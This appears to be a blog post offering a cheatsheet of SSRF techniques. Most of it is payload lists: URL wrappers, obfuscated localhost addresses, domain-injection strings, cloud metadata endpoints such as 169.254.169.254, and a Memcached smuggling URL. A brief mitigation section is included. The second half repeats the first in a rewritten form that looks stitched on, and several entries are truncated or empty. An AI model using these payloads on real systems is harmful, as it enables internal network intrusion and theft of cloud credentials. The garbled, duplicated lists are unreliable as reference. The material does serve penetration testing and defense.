Server-Side Request Forgery (SSRF) is a critical web application vulnerability that allows attackers to manipulate server-side requests. This SSRF cheatsheet provides an extensive collection of techniques to bypass security filters and exploit SSRF vulnerabilities. Whether you’re a penetration tester, security researcher, or developer, this guide will enhance your understanding of SSRF attacks and defenses. (Be sure to check out the nmap cheatsheet here, & best pentest tools, here)
Understanding SSRF
What is SSRF?
SSRF occurs when an attacker can manipulate a server into making unintended requests to internal or external resources. This can lead to data exfiltration, internal network scanning, and even remote code execution in some cases.
Why is SSRF Dangerous?
SSRF attacks can bypass firewalls and access internal systems that are not directly accessible from the internet. This makes SSRF a potent tool for attackers to pivot within internal networks and exploit other vulnerabilities.
SSRF Cheatsheet: Detection Techniques
Timing Differences
One of the first steps in the SSRF cheatsheet is learning to detect potential SSRF vulnerabilities. Analyze response times when requesting different domains, IPs, or ports. Significant timing differences may indicate filtering or processing of certain requests, hinting at potential SSRF vulnerabilities.
Error Messages
Pay attention to error messages returned by the application. Verbose error messages might reveal information about the internal network structure or filtering mechanisms in place.
URL Schema and Wrappers
PHP SSRF Wrappers
PHP environments often support various URL schemas that can be exploited in SSRF attacks. The SSRF cheatsheet includes these common PHP wrappers:
- gopher://
- file://
- http:// and https://
- ftp://
- dict://
- expect://
Java SSRF Wrappers
Java environments have their own set of URL schemas. The SSRF cheatsheet provides these Java-specific wrappers:
- jar:http://localhost!/
- netdoc:///etc/passwd
- jar:ftp://local-domain.com!/
ASP.NET and cURL Wrappers
For comprehensive coverage, the SSRF cheatsheet also includes wrappers for ASP.NET and cURL environments, expanding the attack surface for SSRF exploits.
Bypass Techniques
Open Redirect SSRF Bypass
An essential part of the SSRF cheatsheet is understanding how to use open redirects to bypass server-side filters. By leveraging an open redirect vulnerability, attackers can make requests appear to originate from trusted domains.
Example:
/redirect?url=http://internal-server/sensitive-data
Localhost Bypass Attempts
IPv4 and IPv6 Variations
The SSRF cheatsheet provides numerous ways to represent localhost:
- 127.0.0.1
- 0.0.0.0
- 0177.00.00.01 (Octal)
- 0x7f000001 (Hexadecimal)
- ::1 (IPv6)
Decimal and Encoded Representations
Advanced bypass techniques in the SSRF cheatsheet include:
- 2130706433 (Decimal representation of 127.0.0.1)
- ①②⑦.⓪.⓪.① (Enclosed alphanumeric)
Domain Injection Techniques
The SSRF cheatsheet includes clever ways to inject target domains:
- evil.com@internal-server
- internal-server#evil.com
- internal-server/evil.com
URL Encoding and Fragmentation
Sophisticated bypass attempts in the SSRF cheatsheet involve URL encoding and fragmentation:
- 127.0.0.1%00evil.com
- 127.0.0.1?evil.com
- 127.1.1.1:80@127.2.2.2:80/
Advanced SSRF Cheatsheet Techniques
DNS Rebinding
DNS rebinding is an advanced technique where the attacker controls the DNS resolution of a domain. By rapidly changing the IP address associated with the domain, it’s possible to bypass IP-based filters.
Cloud Metadata SSRF
Many cloud environments have metadata services accessible via specific IP addresses. The SSRF cheatsheet includes techniques to access these services:
- http://169.254.169.254/ (AWS)
- http://metadata.google.internal/ (Google Cloud)
- http://169.254.169.254/metadata/v1/ (DigitalOcean)
Protocol Smuggling
Some applications may allow only specific protocols like HTTP. The SSRF cheatsheet provides techniques to smuggle other protocols within allowed ones:
http://internal-server:11211/#{urlencode("stats\r\n")}
This example attempts to send a Memcached command through an HTTP request.
Mitigation Strategies
While the SSRF cheatsheet focuses on attack techniques, it’s crucial to understand mitigation strategies:
Whitelisting
Implement a strict whitelist of allowed domains and IP ranges. Be cautious with wildcard subdomains.
Input Validation
Thoroughly validate and sanitize user inputs, especially those used in server-side requests.
Network Segmentation
Properly segment your network to minimize the impact of successful SSRF attacks.
Disable Unnecessary URL Schemas
Disable URL schemas that are not required for the application’s functionality.
Conclusion
This SSRF cheatsheet provides a comprehensive overview of SSRF attack techniques and bypass methods. From basic localhost representations to advanced protocol smuggling, the cheatsheet covers a wide range of scenarios that security professionals might encounter.
Remember that the techniques in this SSRF cheatsheet should only be used in authorized testing environments. Always obtain proper permissions before attempting any security testing.
By understanding these SSRF techniques and implementing proper mitigation strategies, developers and security professionals can better protect their applications from these potentially devastating vulnerabilities.
Stay updated with the latest SSRF cheatsheet additions as new techniques and bypasses are discovered in this ever-evolving field of web application security.
SSRF Whitelist Filter Bypass Techniques
- Timing Difference Description: During the detection phase, analyze response times to identify potential filtering of different domains, IPs, or ports.
- URL Schema / Wrappers Description: Exploit SSRF vulnerabilities using various URL schemas, categorized by framework or language.
2.1 PHP SSRF Wrappers
- gopher:// fd:// expect:// ogg:// tftp:// dict:// ftp:// ssh2:// file:// http:// https:// imap:// pop3:// mailto:// smtp:// telnet://
2.2 ASP.NET SSRF Wrappers
- gopher:// ftp:// file:// http:// https://
2.3 Java SSRF Wrappers
- ftp:// file:// http:// https:// gopher:// netdoc:///etc/passwd, netdoc:///etc/hosts, jar:proto-schema://blah!/ jar: jar: jar: jar:ftp://local-domain.com!/
Note: OpenJDK 8+ does not follow redirects if protocols don’t match.
2.4 cURL SSRF Wrappers
- file:/// dict:// sftp:// ldap:// tftp:// gopher:// ssh:// http:// https:// imap:// pop3:// smtp:// telnet://
- Open Redirect SSRF Bypass Description: Utilize open redirects to bypass server-side whitelist filtering by appearing to originate from the target domain.
Example: /foo/bar?vuln-function=
- Basic Localhost Bypass Attempts 4.1 IPv4 and IPv6 Bypasses
- All IPv4: 0, 0.0.0.0, 0000, 00000000
- All IPv6: ::
- Localhost IPv6: ::1
- IPv4 mapped IPv6: 0:0:0:0:0:FFFF:7F00:0001
- Octal conversions: 0177.00.00.01, 017700000001
- Hex conversion: 0x7f000001
4.2 Various Bypasses
- Port-specific: 127.0.0.1:80, 127.0.0.1:443, 127.0.0.1:22
- Shortened: 127.1:80, 0
- IPv6 variants: :80/ :25/ :3128/ :80/
- Encoded: ①②⑦.⓪.⓪.⓪
- Decimal/Octal/Hex: 2130706433/ 017700000001, 0x7f000001/
4.3 Domain Injection Techniques
- {domain}@127.0.0.1, 127.0.0.1#{domain} {domain}.127.0.0.1
- 127.0.0.1/{domain} 127.0.0.1/?d={domain}
- Similar techniques with “localhost” instead of IP
4.4 URL Encoding and Fragmentation
- 127.0.0.1%00{domain} 127.0.0.1?{domain} 127.0.0.1///{domain}
- 1.1.1.1 &@2.2.2.2# @3.3.3.3/
- 127.1.1.1:80@127.2.2.2:80/ 127.1.1.1:80@@127.2.2.2:80/
- Hosts File Bypass Attempts 5.1 Enclosed Alphanumeric
This reordered and rewritten description provides a structured approach to SSRF whitelist filter bypass techniques, categorizing them into main sections and subsections for easier understanding and implementation.
Leave a Reply